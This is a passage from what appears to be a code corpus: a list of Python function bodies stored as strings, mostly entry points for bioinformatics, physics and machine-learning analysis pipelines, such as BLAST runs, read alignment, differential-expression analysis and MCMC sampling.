print tmpLogMessage\n tmpLogMessages.append(tmpLogMessage)\n else:\n tmpLogMessage = 'Creating directory \"'+self.analysisPath+'\".\\n'\n #print tmpLogMessage\n tmpLogMessages.append(tmpLogMessage)\n os.makedirs(self.analysisPath)\n \n #\n # create the logfile\n #\n tmpLogMessages += self.openLogfileConnection()\n \n #\n # write tmpLogMessages to logfile\n #\n SEAseqPipeLine.logfile.write(''.join(tmpLogMessages))\n \n #\n # create the database\n #\n self.database.create()\n \n #\n # add run to runs table\n #\n self.database.addToRunsTable(self.startTimeStr, self.command, self.commandLine, True, MASTER)\n \n return 0", "def run(self):\n # params\n work_dir = self.param_required(\"work_dir\")\n\n # initial sequence loading, using ensembl-analysis scripts \n self.initial_sequence_loading(work_dir)\n\n # load data from the corresponding core db tables\n external_db_map = self.load_map_from_core_db(\"external_db\", [\"db_name\", \"external_db_id\"], work_dir) # for external_db\n attrib_type_map = self.load_map_from_core_db(\"attrib_type\", [\"code\", \"attrib_type_id\"], work_dir) # for attrib_type\n seq_region_map = self.load_map_from_core_db(\"seq_region\", [\"name\", \"seq_region_id\"], work_dir) # for seq_region\n\n # update synonyms and seq_region_attribs\n unversion = self.param(\"unversion_scaffolds\")\n is_primary_assembly = self.from_param(\"manifest_data\", \"agp\", not_throw = True) is None\n seq_region_file = self.from_param(\"manifest_data\", \"seq_region\", not_throw = True)\n\n # add seq_region synonyms\n self.add_sr_synonyms(seq_region_file,\n seq_region_map,\n external_db_map,\n self.pjc(work_dir, \"seq_region_syns\"),\n unversion = unversion)\n\n # add seq_region attributes\n self.add_sr_attribs(seq_region_file,\n seq_region_map,\n attrib_type_map,\n self.pjc(work_dir, \"seq_region_attr\"),\n unversion = unversion)\n\n # add seq_region EBI and BRC4 name attributes in the \"BRC4 mode\"\n # special case of attributes adding with default values derived from seq_region names\n # do not add if preparing to swap RefSeq and GeneBank ids; in this case attributes to be added at a later stage in pipeline\n # (easier to insert then to update)\n if self.param(\"brc4_mode\") and not self.param(\"swap_gcf_gca\"):\n self.add_sr_ebi_brc4_names(seq_region_file,\n seq_region_map,\n attrib_type_map,\n self.pjc(work_dir, \"seq_region_ebi_brc4_name\"),\n unversion = unversion)\n\n # add karyotype related data\n self.add_karyotype_data(seq_region_file,\n seq_region_map,\n attrib_type_map,\n self.pjc(work_dir, \"karyotype\"),\n unversion = unversion)", "def export_bioanalyzer(args):\n clarity_epp.export.bioanalyzer.samplesheet(lims, args.process_id, args.output_file)", "def main():\n \n # Load the model\n model = EpamModel()\n model.load(\"bayes_1.zip\")\n \n # Load and clean/prepare test data \n x_test = pd.read_csv('BAZA_VALID_INPUT.csv')\n x_test_clean = cleanup_df(x_test)\n \n # Predict\n # FIXME: This currently does probabilistic prediction only!\n y_pred = model.predict(x_test_clean)\n \n with open('output.txt', 'w+') as f:\n for label in y_pred:\n f.write(f'{label}\\n')", "def run_blast(self, metadata, analysistype, program, outfmt, evalue='1E-5', num_threads=12, num_alignments=1000000,\n perc_identity=70, task='blastn'):\n with progressbar(metadata) as bar:\n for sample in bar:\n # Run the BioPython BLASTn module with the genome as query, fasta (target gene) as db.\n make_path(sample[analysistype].reportdir)\n # Set the name and path of the BLAST report as reportdir/samplename_blastprogram.tsv\n sample[analysistype].report = os.path.join(\n sample[analysistype].reportdir, '{name}_{program}_{at}.tsv'.format(name=sample.name,\n program=program,\n at=analysistype))\n # Check the size of the report (if it exists). If it has size 0, something went wrong on a previous\n # iteration of the script. Delete the empty file in preparation for another try\n try:\n size = os.path.getsize(sample[analysistype].report)\n # If a report was created, but no results entered - program crashed, or no sequences passed\n # thresholds, remove the report, and run the blast analyses again\n if size == 0:\n os.remove(sample[analysistype].report)\n except FileNotFoundError:\n pass\n # Split the extension from the file path\n db = os.path.splitext(sample[analysistype].combinedtargets)[0]\n # Create the command line argument using the appropriate BioPython BLAST wrapper\n if program == 'blastn':\n blast = self.blastn_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt,\n perc_identity=perc_identity,\n task=task)\n elif program == 'blastp':\n blast = self.blastp_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n elif program == 'blastx':\n blast = self.blastx_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n elif program == 'tblastn':\n blast = self.tblastn_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n elif program == 'tblastx':\n blast = self.tblastx_commandline(sample=sample,\n analysistype=analysistype,\n db=db,\n evalue=evalue,\n num_alignments=num_alignments,\n num_threads=num_threads,\n outfmt=outfmt)\n else:\n blast = str()\n assert blast, 'Something went wrong, the BLAST program you provided ({program}) isn\\'t supported'\\\n .format(program=program)\n # Save the blast command in the metadata\n sample[analysistype].blastcommand = str(blast)\n # Only run blast if the report doesn't exist\n if not os.path.isfile(sample[analysistype].report):\n try:\n blast()\n except ApplicationError as e:\n logging.debug(e)\n try:\n os.remove(sample[analysistype].report)\n except (IOError, ApplicationError):\n pass\n # Return the updated metadata object\n return metadata", "def main(argv=None):\n\n if argv is None:\n argv = sys.argv\n\n parser = E.OptionParser(\n version=\"%prog version: $Id: maq2assembly.py 2781 2009-09-10 11:33:14Z andreas $\")\n\n parser.add_option(\"-f\", \"--is-forward-coordinates\", dest=\"forward_coordinates\",\n help=\"translate to forward coordinates.\", action=\"store_true\")\n\n parser.add_option(\"-p\", \"--output-filename-pattern\", dest=\"output_filename_pattern\", type=\"string\",\n help=\"OUTPUT filename pattern for additional data [%default].\")\n\n parser.add_option(\"--method\", dest=\"methods\", type=\"choice\", action=\"append\",\n choices=(\"gff\", \"coverage\", \"region\", \"quality\"),\n help=\"methods to apply [%default].\")\n\n parser.set_defaults(\n output_format=\"%08i\",\n output_filename_pattern=\"%s\",\n methods=[],\n )\n\n (options, args) = E.Start(parser)\n\n ################################################\n ################################################\n ################################################\n # pick a processor\n ################################################\n methods = []\n\n if len(options.methods) == 0:\n raise \"please supply at least one method to apply.\"\n\n genome_fasta, queries_fasta = None, None\n\n for method in options.methods:\n if method == \"gff\":\n methods.append(BuilderGFF(genome_fasta, queries_fasta, options))\n elif method == \"coverage\":\n methods.append(\n BuilderCoverage(genome_fasta, queries_fasta, options))\n elif method == \"quality\":\n methods.append(\n BuilderQuality(genome_fasta, queries_fasta, options))\n elif method == \"region\":\n methods.append(BuilderRegion(genome_fasta, queries_fasta, options))\n\n for method in methods:\n method.printHeader()\n\n ninput, noutput = 0, 0\n id = 0\n for contig, start, end, reads, qualities in reader(options.stdin):\n\n ninput += 1\n id += 1\n for m in methods:\n m(id, contig, start, end, reads, qualities)\n\n noutput += 1\n\n options.stdlog.write(\"# ninput=%i, noutput=%i\\n\" % (ninput, noutput))\n\n E.Stop()", "def main():\n\n # Parse arguments. The parser will raise an exception if required arguments are not present.\n parser = argparse.ArgumentParser()\n\n subparsers = parser.add_subparsers(dest='command')\n\n # Arguments for the runtest command.\n cmd_runtest = subparsers.add_parser('runtest')\n runtest_required_named = cmd_runtest.add_argument_group('named arguments')\n runtest_required_named.add_argument('-c', '--corpus',\n help='Corpus root directory containing all speakers.',\n metavar='corpus',\n required=True)\n runtest_required_named.add_argument('-o', '--csvout',\n help='CSV output file.',\n metavar='csvout',\n required=True)\n runtest_required_named.add_argument('-i', '--impl',\n help='Test runner implementation: fast, medium or slow.',\n metavar='impl',\n required=False,\n default='fastest')\n\n # Arguments for the analyse command.\n cmd_analyse = subparsers.add_parser('analyse')\n analyse_required_named = cmd_analyse.add_argument_group('named arguments')\n analyse_required_named.add_argument('-r', '--results',\n help='Input CSV results file.',\n metavar='results',\n required=True)\n analyse_required_named.add_argument('-t', '--th_user',\n help='User-defined threshold.',\n metavar='th_user',\n required=False,\n type=float,\n default=5.79)\n\n # Parse the arguments.\n args = parser.parse_args()\n\n # Dispatch to the correct command.\n if args.command == 'runtest':\n do_runtest(args)\n elif args.command == 'analyse':\n do_analyse(args)\n else:\n raise ValueError('Unknown command {}'.format(args.command))", "def main():\n (\n calibration_file,\n drs4_ped_file,\n time_calibration_file,\n systematic_correction_file,\n drive_log_file,\n run_summary_file,\n pedestal_ids_file,\n run_number,\n ) = data_sequence_cli_parsing()\n\n if options.verbose:\n log.setLevel(logging.DEBUG)\n else:\n log.setLevel(logging.INFO)\n\n # Run the routine piping all the analysis steps\n rc = data_sequence(\n calibration_file,\n drs4_ped_file,\n time_calibration_file,\n systematic_correction_file,\n drive_log_file,\n run_summary_file,\n pedestal_ids_file,\n run_number,\n )\n sys.exit(rc)", "def main():\n\n # Parse command line arguments\n args = parse_arguments()\n # Initialize logging\n logger = initialize_logger(args.prefix)\n\n # Set translation tables according to user input. Defaults to standard genetic code (table 1)\n if args.translation_table_origin:\n translation_table_origin = args.translation_table_origin\n else:\n translation_table_origin = 1\n\n if args.translation_table_host:\n translation_table_host = args.translation_table_host\n else:\n translation_table_host = 1\n\n # set threshold if provided by the user and otherwise fall back to defaults\n if args.threshold:\n lower_threshold = args.threshold\n elif args.frequency:\n lower_threshold = 5\n else:\n lower_threshold = 0.1\n\n # initialize Sequence object with user provided input\n sequence = Sequence(IO.load_file(args.input), args.origin, args.host,\n translation_table_origin=translation_table_origin,\n translation_table_host=translation_table_host,\n use_frequency=args.frequency,\n lower_threshold=lower_threshold,\n lower_alternative=args.lower_frequency_alternative)\n\n # harmonize the provided sequence\n harmonized_codons = sequence.get_harmonized_codons()\n # check if input and output sequence are identical\n verify_sequence = sequence.verify_harmonized_sequence()\n\n # log summary to standard output and log file\n logger.info('SUMMARY:\\n')\n if verify_sequence:\n text = 'Success! Translation of harmonized and original sequence match:\\n\\n' \\\n '{}\\n'.format(sequence.harmonized_translated_sequence)\n logger.info(text)\n else:\n logger.error('ERROR: Translations of harmonized and original sequence DO NOT match!')\n logger.info('Harmonized codons: {}\\n'.format(len(harmonized_codons)))\n\n df_above_thresh = 0\n for c in sequence.codons:\n if c['final_df'] > 0.2:\n df_above_thresh += 1\n\n if df_above_thresh > 0:\n logger.warning(\"WARNING: Difference in origin and target host codon usage of {} out of {} codons ({}%) exceeds 20%!\\n\".format(df_above_thresh,\n len(sequence.codons),\n round(df_above_thresh/len(sequence.codons)*100, 1)))\n else:\n logger.info(\"Differences of codon usage in origin and target host are within 20%.\\n\")\n\n table_header = '{:<10} {:^3} {:^4} {:^4} {:^7} {:>6} {:<7} {:>6}'.format('position', 'aa', 'orig', 'new',\n 'initial', 'final', 'origin', 'target')\n logger.info(table_header)\n\n warnings = []\n\n # Iterate over all codons in the sequence and print some statistics and information\n for c in sequence.codons:\n if str(c['original']) != str(c['new']):\n line = '{:<10} {:^3} {:<4} -> {:<4} {:<5.2f} -> {:<3.2f} {:<5.2f} -> {:<3.2f}'.format(c['position'],\n c['aa'],\n c['original'],\n c['new'],\n c['initial_df'],\n c['final_df'],\n c['origin_f'],\n c['target_f'])\n else:\n line = '{:<10} {:^3} {:<12} {:<5.2f} {:<5.2f} -> {:<3.2f}'.format(c['position'],\n c['aa'],\n c['original'],\n c['initial_df'],\n c['origin_f'],\n c['target_f'])\n if c['ambiguous']:\n line += ' WARNING: Original codon is ambiguous!'\n warnings.append('Codon {} ({}) coding for {} is ambiguous! {} was chosen for the '\n 'harmonized sequence!'.format(c['position'],\n c['original'],\n c['aa'],\n c['new']))\n\n logger.info(line)\n\n logger.info('\\nCodon-harmonized sequence:\\n\\n{}'.format(sequence.harmonized_sequence))\n if warnings:\n logger.warn('\\nWARNINGS OCCURRED DURING HARMONIZATION:\\n')\n for warning in warnings:\n logger.warn(warning)\n\n plot(sequence, args.prefix)\n\n # Exit gracefully\n exit(0)", "def execute(self, targets):", "def bayesian(self, \n sammy_inputs, # inp (from self.endf2inp_par_ndf()), par, cov\n xs_measurement, # CrossSection instance\n sammy_outputs # par, cov\n ):\n # Set up temporary files #\n tempinp = temp_file_gen('Sammy_bayesian','inp')\n tempdata = temp_file_gen('Sammy_bayesian','dat')\n shutil.copy(sammy_inputs[0], tempinp)\n sammy_inputs[0] = tempinp\n # \n # Construct .dat file from xs_measurement #\n data = np.array([xs_measurement.energies, \n xs_measurement.cross_section,\n xs_measurement.statistical_unc]).T\n self.write_data(data, tempdata)\n #\n # Include .dat file in list of SAMMY inputs #\n sammy_inputs.insert(2,tempdata)\n #\n # Change reaction type in input file #\n self.modify_inp(sammy_inputs[0], new_type = xs_measurement.sammy_type)\n #\n if self.include_correlations:\n # Add experimental uncertainties to inp file #\n self.exp_unc_into_inp(sammy_inputs[0], xs_measurement)\n #\n # Run SAMMY #\n self.run(sammy_inputs, ['SAMMY.PAR','SAMMY.COV'], \n output_names = sammy_outputs)\n #\n # Clean up #\n if self.cleanup:\n for p in [tempinp, tempdata]: os.remove(p)\n #", "def runall():\n sclogic.runall()", "def __init__(self, reads1, reads2):\n print \"Start Analysis...\"\n self.alignment()\n self.sai_to_sam()\n self.sam_to_bam()\n #self.clean_files()", "def main(yaml_file, plot, sampler_file, write, direc, label, plot_format):\n if mpi.am_single_or_primary_process:\n console = Console(width=100)\n console.print(\n Panel(\"Welcome to yabf!\", box=box.DOUBLE_EDGE),\n style=\"bold\",\n justify=\"center\",\n )\n start = time.time()\n\n likelihood = load_likelihood_from_yaml(yaml_file)\n output_prefix = Path(direc) / (label or likelihood.name or Path(yaml_file).stem)\n if not output_prefix.parent.exists():\n output_prefix.mkdir(parents=True)\n\n if sampler_file is not None:\n sampler, runkw = load_sampler_from_yaml(\n sampler_file,\n likelihood,\n override={\"output_prefix\": output_prefix},\n )\n else:\n sampler, runkw = load_from_yaml(\n yaml_file,\n override={\"output_prefix\": output_prefix},\n )\n\n # make sure it's the same as the actual sampler.\n output_prefix = sampler.output_file_prefix\n\n if mpi.am_single_or_primary_process:\n console.print(Rule(f\"Sampler [{sampler.__class__.__name__}] \"))\n console.print(f\"[bold]Sampler Options:[/] {sampler.sampler_kwargs}\")\n console.print(f\"[bold]Run Options:[/] {runkw}\")\n console.print(f\"[bold]Output Directory:[/]\\t{sampler.output_dir}\")\n console.print(f\"[bold]Output Prefix:[/]\\t{sampler.output_file_prefix}\")\n\n console.print()\n console.print(Rule(\"Model\"))\n\n console.print(\"[bold]Likelihoods[/]\")\n for lk in likelihood._subcomponents:\n if isinstance(lk, _LikelihoodInterface):\n console.print(lk.name)\n console.print()\n\n console.print(\"[bold]Components[/]\")\n for loc, cmp in likelihood.child_components.items():\n if not isinstance(cmp, _LikelihoodInterface):\n console.print(loc)\n console.print()\n\n console.print(\n f\"[bold]Active Parameters[/] [blue]({len(likelihood.child_active_params)})[/] \"\n )\n _len = max(len(p.name) for p in likelihood.child_active_params)\n _dlen = max(len(str(p.determines)) for p in likelihood.child_active_params)\n for p in likelihood.child_active_params:\n det = str(p.determines).replace(\"'\", \"\").replace(\"(\", \"\").replace(\")\", \"\")\n fid = \"[\" + str(p.fiducial) + \"]\"\n console.print(f\"{p.name:<{_len}} {fid:<8} -----> {det:<{_dlen}}\")\n\n fit_params = sum((p.determines for p in likelihood.child_active_params), ())\n console.print()\n console.print(\"[bold]In-active parameters[/]\")\n for lc in likelihood.child_base_parameter_dct:\n if lc not in fit_params:\n console.print(\n f\"{lc} = {utils.get_loc_from_dict(likelihood.fiducial_params, lc)}\"\n )\n\n console.print()\n console.print(Rule(\"Starting MCMC\"))\n\n mpi.sync_processes()\n mcsamples = sampler.sample(**runkw)\n mpi.sync_processes()\n\n if mpi.am_single_or_primary_process:\n console.print(\"Done.\\n\")\n console.print(Rule())\n console.print()\n console.print(Rule(\"[bold]Basic Chain Diagnostics[/]\"))\n\n try:\n gr = mcsamples.getGelmanRubin()\n except Exception:\n gr = \"unavailable\"\n\n console.print(\"Gelman-Rubin Statistic: \", gr)\n console.print()\n console.print(Rule(\"Correlation Lengths\"))\n for i, p in enumerate(mcsamples.getParamNames().names):\n corrlength = mcsamples.getCorrelationLength(i, weight_units=False)\n console.print(f\"{p.name}:\\t{corrlength:1.3e}\")\n\n console.print()\n console.print(\"Mean (+- std) Posterior Values:\")\n mean = mcsamples.getMeans()\n std = mcsamples.getVars()\n\n for m, s, p in zip(mean, std, mcsamples.getParamNames().names):\n console.print(f\"{p.name}:\\t{m:1.3e} +- {s:1.3e}\")\n\n if plot and HAVE_MPL:\n g = plots.getSubplotPlotter()\n g.triangle_plot(\n mcsamples, params=list(likelihood.child_active_params), shaded=True\n )\n\n plt.savefig(f\"{output_prefix}_corner.{plot_format}\")\n\n if write:\n mcsamples.saveAsText(output_prefix)\n\n tot = time.time() - start\n\n console.print(\n f\":tada: Finished in {tot//3600}:{(tot%3600)//60}:{(tot%3600)%60} (h:m:s) :tada:\",\n style=\"bold green\",\n )\n return 0", "def output_main(args):\n\t#clean input file (fold and remove escape chars)\n\treference = clean_fasta(args.infile)\n\tfilterthreshold = args.threshold\n\t#look up proper readset using readset module\n\treadset = args.readset\n\t#if readset is in fasta format, inject fake quality scores\n\t\n\t#run bwa\n\tsamfile = run_bwa(reference, readset)\n\t#convert sam to bam file, and sort\n\tsortedbam = sam_to_sorted_bam(reference, samfile)\n\t#run variant caller freebayes\n\tvcffile = run_var_caller(reference, sortedbam)\n\t#run hapcut suite\n\thapoutfile = run_haplotyper(reference, vcffile, sortedbam, filterthreshold)\n\t#convert hapcut output to sequence and gff\n\tcalls_to_gff(reference, hapoutfile)", "def main(args):\n samples = TQSampleFolder.loadLazySampleFolder(args.input_file + \":\" + args.sample_folder)\n reader = TQSampleDataReader(samples)\n\n # this list contains 2-tuples with (\"CutName\", \"HistogramName\")\n hist_info = list()\n hist_info.append((\"Cut2TagMllSR1VBFVeto\", \"NN_SR1_Signal_Rebin\", \"[ee+mm+em+me]\"))\n hist_info.append((\"Cut2TagMllSR1VBFVeto\", \"NN_SR1_Top\", \"[ee+mm+em+me]\"))\n hist_info.append((\"Cut2TagMllSR1VBFVeto\", \"NN_SR1_Other\", \"[ee+mm+em+me]\"))\n\n processes = list()\n processes.append(Process(\"sig\", r\"Signal\", \"/sig/{channel}/{campaign}/nonres\"))\n processes.append(Process(\"bkg\", r\"Background\", \"/bkg/{channel}/{campaign}/[prompt+nonprompt]\"))\n\n output_directory = \"results/mva_yields_soverb/\"\n ensure_directory(output_directory)\n output_file_name = os.path.splitext(os.path.basename(args.input_file))[0] + \".tex\"\n\n with LaTeXFile.from_rel_path(os.path.join(output_directory, output_file_name)) as tex:\n tex.document_settings.append(\"landscape\")\n tex.write_header()\n tex.begin_document()\n\n logging.info(\"Getting per-bin significances\")\n for cut_name, histogram_name, channel in hist_info:\n logging.info(\"Processing %s/%s\", cut_name, histogram_name)\n hists = dict()\n for process in processes:\n campaign = \"[c16a+c16d+c16e]\"\n hists[process.name] = reader.getHistogram(\n process.path.format(channel=channel, campaign=campaign), \"{}/{}\".format(cut_name, histogram_name)\n )\n\n table_data = list()\n sigs = list()\n hist_sig = hists[\"sig\"]\n hist_bkg = hists[\"bkg\"]\n for i in range(1, hist_sig.GetNbinsX() + 1):\n s = hist_sig.GetBinContent(i)\n b = hist_bkg.GetBinContent(i)\n\n if b != 0:\n # z = math.sqrt(2 * ((s + b) * math.log(1 + s / b) - s))\n z = s / math.sqrt(b)\n sigs.append(z)\n else:\n z = \"--\"\n table_data.append((i, z))\n logging.debug(\"Bin % 2d: %g\", i, z)\n table_data.append((\"Total\", math.sqrt(sum([z ** 2 for z in sigs]))))\n\n tex.write_table(\n table_data,\n [\"{}\", \"{:.4f}\"],\n [\"Bin\", \"Significance\"],\n \"{}/{}\".format(cut_name, histogram_name),\n format_rows=\"cc\",\n )\n\n tex.end_document()\n tex.write_make_file()", "def run(self):\n contig_file = self.data.contigfiles[0]\n reads = self.data.readfiles\n\n ## Index contigs using IS algorithm\n prefix = os.path.join(self.outpath, 'bt2')\n cmd_args = [self.build_bin, '-f', contig_file, prefix]\n self.arast_popen(cmd_args, overrides=False)\n\n ## Align reads\n samfile = os.path.join(self.outpath, 'align.sam')\n cmd_args = [self.executable, '-x', prefix, '-S', samfile,\n '-p', self.process_threads_allowed]\n if len(reads) == 2:\n cmd_args += ['-1', reads[0], '-2', reads[1]]\n elif len(reads) == 1:\n cmd_args += ['-U', reads[0]]\n else:\n raise Exception('Bowtie plugin error')\n self.arast_popen(cmd_args, overrides=False)\n\n if not os.path.exists(samfile):\n raise Exception('Unable to complete alignment')\n return {'alignment': samfile}", "def main():\n parser = argparse.ArgumentParser()\n\n # Add arguments to parser\n parser.add_argument(\n '-base_data_dir', default='../data',\n help='Root directory of data', type=str)\n parser.add_argument(\n '-dataset', default='litbank', choices=['litbank', 'ontonotes'], type=str)\n parser.add_argument('-base_model_dir',\n default='../models',\n help='Root folder storing model runs', type=str)\n parser.add_argument('-model_size', default='large', type=str,\n help='BERT model type')\n parser.add_argument('-doc_enc', default='overlap', type=str,\n choices=['independent', 'overlap'], help='BERT model type')\n parser.add_argument('-pretrained_bert_dir', default='../resources', type=str,\n help='SpanBERT model location')\n parser.add_argument('-max_segment_len', default=512, type=int,\n help='Max segment length of BERT segments.')\n parser.add_argument('-top_span_ratio', default=0.3, type=float,\n help='Ratio of top spans proposed as mentions.')\n\n parser.add_argument('-ment_emb', default='endpoint', choices=['attn', 'max', 'endpoint'],\n type=str)\n parser.add_argument('-max_span_width',\n help='Max span width', default=20, type=int)\n parser.add_argument('-mlp_depth', default=1, type=int,\n help='Number of hidden layers in other MLPs')\n parser.add_argument('-mlp_size', default=3000, type=int,\n help='MLP size used in the model')\n\n parser.add_argument('-cross_val_split', default=0, type=int,\n help='Cross validation split to be used.')\n parser.add_argument('--batch_size', '-bsize',\n help='Batch size', default=1, type=int)\n parser.add_argument('-num_train_docs', default=None, type=int,\n help='Number of training docs.')\n parser.add_argument('-dropout_rate', default=0.3, type=float,\n help='Dropout rate')\n parser.add_argument('-max_epochs',\n help='Maximum number of epochs', default=25, type=int)\n parser.add_argument('-seed', default=0,\n help='Random seed to get different runs', type=int)\n parser.add_argument('-init_lr', help=\"Initial learning rate\",\n default=5e-4, type=float)\n parser.add_argument('-checkpoint', help=\"Use checkpoint\",\n default=False, action=\"store_true\")\n parser.add_argument('-eval', help=\"Evaluate model\",\n default=False, action=\"store_true\")\n parser.add_argument('-slurm_id', help=\"Slurm ID\",\n default=None, type=str)\n\n args = parser.parse_args()\n\n model_name = get_mention_model_name(args)\n print(model_name)\n\n model_dir = path.join(args.base_model_dir, model_name)\n args.model_dir = model_dir\n best_model_dir = path.join(model_dir, 'best_models')\n args.best_model_dir = best_model_dir\n if not path.exists(model_dir):\n os.makedirs(model_dir)\n if not path.exists(best_model_dir):\n os.makedirs(best_model_dir)\n\n if args.dataset == 'litbank':\n args.data_dir = path.join(args.base_data_dir, f'{args.dataset}/{args.doc_enc}/{args.cross_val_split}')\n else:\n args.data_dir = path.join(args.base_data_dir, f'{args.dataset}/{args.doc_enc}')\n\n # if args.dataset == 'ontonotes':\n # args.pretrained_model = path.join(\n # args.pretrained_mention_model_dir, f'mention_ontonotes_{args.model_size}_{args.ment_emb}.pt')\n # Log directory for Tensorflow Summary\n\n Experiment(**vars(args))", "def analyse ( self ) :\n odin = self.get( self.RootInTES + 'DAQ/ODIN' )\n \n ## Check for PVs\n PVs = self.get( self.RootInTES + self.InputPrimaryVertices )\n if not PVs or PVs.size() == 0:\n self.setFilterPassed( False )\n return SUCCESS\n\n ## get recontructed B+ mesons\n Bs = self.select ( 'B' , eval( self._cut % self._selection ) )\n \n if not Bs or Bs.size() == 0:\n self.setFilterPassed( False )\n return SUCCESS \n\n ## Select random candidate\n r = self.random( odin )\n n = Bs.size()\n for i in xrange( n ):\n if r <= ( float( i ) / float( n ) ): break\n B = Bs[ i ]\n \n tisTos = self.tisTosSignal( B, \"Hlt1Track(AllL0|Muon)Decision\" )\n if tisTos.tos():\n ## This has to be a clone, otherwise it doesn't work...\n self.markParticle( B.clone() )\n self.setFilterPassed( True )\n else:\n self.setFilterPassed( False )\n\n return SUCCESS", "def main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--file', '-f', type=str, help='path to corpus file', default='./train')\n args = parser.parse_args()\n\n corpus_reader = CorpusReader(args.file)\n model = BigramModel(corpus_reader.sents())\n\n test_sentences = ['Suggestive, Watson, is it not?',\n 'It is amazing that a family can be torn apart by something as simple as a pack of wild dogs!',\n 'So spoke Sherlock Holmes and turned back to the great scrapbook in which he was arranging and indexing some of his recent material.',\n 'What I like best about my friends is that they are few.',\n 'Friends what is like are they about I best few my that.']\n\n # prints two paragraphs with each five sentences\n for _ in range(2):\n print(generate(model, 5) + '\\n')\n\n # for each sentence in the test_sentences print the perplexity\n for sentence in test_sentences:\n print(model.perplexity(nltk.word_tokenize(sentence)))", "def main():\n\n # Initial message\n taq_data_tools_responses_physical_short_long.taq_initial_message()\n\n # Tickers and days to analyze\n year = '2008'\n tickers = ['AAPL', 'GOOG']\n taus_p = [x for x in range(10, 101, 10)]\n tau = 1000\n\n # Basic folders\n taq_data_tools_responses_physical_short_long.taq_start_folders(year)\n\n # Run analysis\n taq_data_plot_generator(tickers, year, tau, taus_p)\n\n print('Ay vamos!!!')\n\n return None", "def gene_rnaseq(args):\n log.info('running for genes')\n\n group = 'gene' # !!!!\n\n ###########################\n ## sense strand analysis ##\n ###########################\n ## control, args['c1']\n ctl_args = args.copy()\n ctl_args['align_to_te'] = False # required !!!!\n ctl_args['extra_index'] = None # required !!!!\n ctl_args['path_out'] = os.path.join(args['path_out'], args['C'])\n ctl_bam = gene_aligner(args['c1'], args['C'], ctl_args, args['c2'])\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.sens.txt')\n run_featureCounts(\n gtf=args['gtf'],\n bam_files=ctl_bam,\n out=ctl_count,\n strandness=args['s'],\n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## treatment, args['t1']\n tre_args = args.copy()\n tre_args['align_to_te'] = False # required !!!!\n tre_args['extra_index'] = None # required !!!!\n tre_args['path_out'] = os.path.join(args['path_out'], args['T'])\n tre_bam = gene_aligner(args['t1'], args['T'], tre_args, args['t2'])\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], 'gene', 'count', 'count.sens.txt')\n run_featureCounts(\n gtf=args['gtf'], \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['s'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '.vs.' + args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='sense')\n\n ###############################\n ## antisense strand analysis ##\n ###############################\n # determine the strandness\n if args['s'] == 2:\n args['anti_strand'] = 1\n elif args['s'] == 1:\n args['anti_strand'] = 2\n else:\n args['anti_strand'] = 0\n\n ## count reads\n ctl_count = os.path.join(args['path_out'], args['C'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=args['gtf'], \n bam_files=ctl_bam, \n out=ctl_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## count reads\n tre_count = os.path.join(args['path_out'], args['T'], group, 'count', 'count.anti.txt')\n run_featureCounts(\n gtf=args['gtf'], \n bam_files=tre_bam, \n out=tre_count, \n strandness=args['anti_strand'], \n threads=args['threads'], \n overwrite=args['overwrite'])\n\n ## de analysis using DESeq2\n de_path = os.path.join(args['path_out'], args['C'] + '.vs.' + args['T'])\n deseq2_exe(\n control=ctl_count, \n treatment=tre_count, \n path_out=de_path, \n genome=args['genome'], \n nameA=args['C'], \n nameB=args['T'], \n group=group,\n path_suffix='antisense')", "def execute_expression_analysis(self):\n print (\"Expression analisys start...\")\n n = \"consexpression\"\n out_merge_table = ''\n self.execute_merge_table(self._count_table, out_merge_table)\n # 1 ------------------ edgeR -----------------\n out_edger = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_edger.csv\"\n self._edger = EdgeR(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_edger)\n self._edger.run_edger()\n # 2 ------------- BaySeq --------------------\n out_bayseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_baySeq.csv\"\n self._bayseq = BaySeq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_bayseq)\n self._bayseq.run_bayseq()\n # 3 ------------- DESeq --------------------\n out_deseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_DESeq.csv\"\n self._deseq = DESeq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_deseq)\n self._deseq.run_deseq()\n # 4 ------------- NOISeq --------------------\n out_noiseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_NOISeq.csv\"\n self._noiseq = Noiseq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_noiseq)\n self._noiseq.run_noiseq()\n # 5 ------------- EBSeq --------------------\n out_ebseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_EBSeq.csv\"\n self._ebseq = Ebseq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_ebseq)\n self._ebseq.run_ebseq()\n # 6 ------------- SAMSeq --------------------\n out_samseq = self._exp_dao._read_directory + \"/\" + self._exp_dao._name + \"_SAMSeq.csv\"\n self._samseq = SamSeq(out_merge_table, self._exp_dao._group_name, self._exp_dao._replic, out_samseq)\n self._samseq.run_samseq()\n # 7 ------------- limma-voom --------------------\n out_limmavoom = self._exp_dao._read_directory + \"/\" + 